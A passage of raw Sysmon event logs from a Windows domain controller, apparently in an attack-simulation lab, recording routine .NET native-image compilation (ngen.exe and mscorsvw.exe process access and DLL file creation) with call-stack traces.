t.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.156{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-8F01-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.156{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-8F01-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.156{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-8F01-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:59.141{59A5CD1D-9117-6005-8E01-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\4a4-0\TRLParserCOMInterface.dll2021-01-18 13:45:59.141 10341000x80000000000000005819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.109{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-8E01-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.109{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-8E01-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:59.109{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-8E01-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9117-6005-8D01-00000000A301}3792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.078{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9117-6005-8D01-00000000A301}3792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:59.078{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9117-6005-8D01-00000000A301}3792C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:59.047{59A5CD1D-9116-6005-8C01-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\538-0\Microsoft.ActiveDirectory.TRLParser.dll2021-01-18 13:45:59.047 10341000x80000000000000005854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9118-6005-9901-00000000A301}4876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.562{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9118-6005-9901-00000000A301}4876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:00.562{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9118-6005-9901-00000000A301}4876C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:00.500{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9118-6005-9801-00000000A301}864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.500{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9118-6005-9801-00000000A301}864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:00.500{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9118-6005-9801-00000000A301}864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:00.391{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9118-6005-9701-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.375{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9118-6005-9701-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:00.375{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9118-6005-9701-00000000A301}4896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:00.063{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9118-6005-9601-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:00.063{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9118-6005-9601-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:00.063{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9118-6005-9601-00000000A301}4236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:01.797{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9119-6005-9E01-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:01.781{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9119-6005-9E01-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
